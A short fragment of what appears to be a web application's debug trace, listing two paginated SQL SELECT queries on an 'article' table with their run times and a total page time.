  14. SELECT * FROM `article` WHERE `id` < 497265 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.014344s ]
  15. SELECT * FROM `article` WHERE `id` < 497265 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.036825s ]
0.156040s